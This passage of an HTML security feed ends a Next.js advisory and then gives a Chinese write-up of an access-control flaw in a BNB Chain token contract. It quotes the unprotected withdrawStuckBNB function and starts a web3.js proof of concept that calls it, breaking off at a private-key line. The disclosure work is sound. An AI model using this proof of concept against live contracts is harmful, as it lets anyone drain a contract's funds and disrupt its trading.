1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">升级修复：</strong></p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important">目前官方已发布修复安全补丁</p></section><section><p><br/></p><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><a href="https://github.com/vercel/next.js/releases/tag/v15.2.3">https://github.com/vercel/next.js/releases/tag/v15.2.3</a> <br/><a href="https://github.com/vercel/next.js/releases/tag/v14.2.25">https://github.com/vercel/next.js/releases/tag/v14.2.25</a> <br/><br/></pre></section><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></p></section><section><section><section><section><section><section><section><section><section></section><section></section><section></section></section><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">5、</strong><strong style="-webkit-tap-highlight-color: transparent; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">参考链接</strong></p></section></section></section></section></section></section></section></section><section><ul class="code-snippet__line-index code-snippet__js list-paddingleft-2" style="list-style-type: none;"><li><p><br/></p></li></ul><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><a href="https://github.com/advisories/GHSA-f82v-jwr5-mffw">https://github.com/advisories/GHSA-f82v-jwr5-mffw</a> <br/><a href="https://www.ddpoc.com/DVB-2023-9004.html">https://www.ddpoc.com/DVB-2023-9004.html</a> <br/><br/></pre></section><p></p><p><a href="https://mp.weixin.qq.com/s/EvaOWq9Rsb2B3SiP8zi9FQ" target="_self">原文链接</a></p>]]></description> <pubDate>Thu, 03 Apr 2025 10:52:52 +0800</pubDate> <author>盛邦安全</author> </item> <item> <title><![CDATA[某合约任意提取BNB漏洞]]></title> <link><![CDATA[https://www.4hou.com/posts/Dx2K]]></link> <description><![CDATA[<section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;">1、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">背景描述</strong></p></section></section></section></section></section><p><br/></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">合约是一个在满足特定条件时在区块链上执行代码的程序，各方以数字签署合同的方式准许并维护它的其运行。这些代码可以是向朋友汇款、买卖 NFT 虚拟商品等一系列复杂的内容。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"> 存在漏洞的目标合约是一个结合Meme文化病毒式传播与去中心化金融（DeFi）的创新项目，旨在通过趣味性和实用性打破传统Meme代币的模式。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">该合约的代币目前市值1400K（USDT），日均交易量150K（USDT）</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;">2、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">问题描述</strong></p></section></section></section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">该合约“withdrawStuckBNB”函数没有添加权限控制，攻击者可以通过调用“withdrawStuckBNB”函数，将合约内所有BNB转至营销地址“marketingAddress”，从而导致合约交易异常。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"> <strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; text-indent: 2em; visibility: visible;">tips：</span></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">BNB是BNB链生态系统的原生代币，该系统包含BNB智能链（BSC）和BNB信标链。在BNB智能链上，BNB用于支付交易费用和参与网络的共识机制。BNB还被用作实用代币，使用户在Binance中心化加密货币交易所进行交易时获得交易费用的折扣。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">BNB在这个合约中的作用包括：作为交易对的配对货币，用于支付交易手续费，流动性池的组成部分，以及手续费收入的分配媒介</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;">3、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">问题代码分析</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: center;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250328/1743154247676294.png" title="1743154172187114.png" alt="QQ20250328-170948.png"/></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section></section></section></section></section><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;color: rgb(51, 51, 51);font-size: 14px;letter-spacing: 0.544px;text-align: justify;box-sizing: border-box !important;overflow-wrap: break-word !important"><p style="text-indent: 0em;">```solidity<br/>function withdrawStuckBNB() external {    <br/>bool success;    <br/>(success,) = address(marketingAddress).call{value: address(this).balance}("");<br/>}<br/>```<br/></p></pre><p><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">在合约代码里面可以看到，`withdrawStuckBNB` 没有添加onlyOwner修饰，只有external修饰</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">tips：</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    Solidity语法中有4中默认函数修饰符</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - public：最大访问权限，任何人都可以调用。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - private：只有合约内部可以调用，不可以被继承。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - internal：子合约可以继承和调用。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - external：外部可以调用，子合约可以继承和调用，当前合约不可以调用。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">onlyOwner是该合约自定义一个修饰器，用于修饰函数，只有合约的所有者才能调用该函数。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: center; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250328/1743154247131416.png" title="1743154187191800.png" alt="QQ20250328-171053.png"/></p><p style="text-indent: 0em;"><span style="color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-indent: 32px; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);">这就意味着任何人都可以调用这个函数，将合约内所有BNB转至营销地址，导致资金被盗。</span></p><p style="text-indent: 0em;"><span style="color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-indent: 32px; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);"><br/></span></p><p style="text-indent: 0em;"><span style="color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-indent: 32px; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);"></span></p><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">4、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">后续利用链分析</strong></p></section></section></section></section></section><p><br/></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">从问题代码可知，任何人都可以调用这个函数，将合约内所有BNB转至营销地址marketingAddress</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">查看marketingAddress的代码，marketingAddress是一个营销地址，更新marketingAddress的代码如下：</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">可以看到，updateMarketingAddress函数存在onlyOwner修饰，只有owner可以调用这个函数，这就意味着只有owner可以更新marketingAddress的地址。所以利用链到此截止，攻击者只能调用withdrawStuckBNB将合约内的BNB转至marketingAddress，但是marketingAddress本身只能由owner更新，所以攻击者无法更新marketingAddress的地址，从而无法将BNB转至攻击者的地址，但是漏洞也能造成合约内BNB的清空，影响合约运行。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250328/1743154248175910.png" title="1743154238951069.png" alt="QQ20250328-171130.png"/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">5、</strong><strong style="-webkit-tap-highlight-color: transparent; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">构造POC</strong></p></section></section></section></section></section><section><p><br/></p><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><p style="text-indent: 0em;"><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">```javascript</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> Web3 = require(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'web3'</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// // 初始化 Web3 实例，这里使用测试网的地址，你可以根据实际情况修改</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> web3 = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">new</span> Web3(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'https://data-seed-prebsc-1-s1.binance.org:8545'</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// const web3 = new Web3('https://bsc-dataseed4.binance.org/');</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> contractABI = [<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">""</span><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"换成完整ABI"</span><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">""</span>];</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> contractAddress = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"0xaaaaa"</span>; <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 替换为目标合约地址</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> contract = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">new</span> web3.eth.Contract(contractABI, contractAddress);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"connect success"</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 如果使用 Node.js，需要添加私钥</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> privateKey = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box 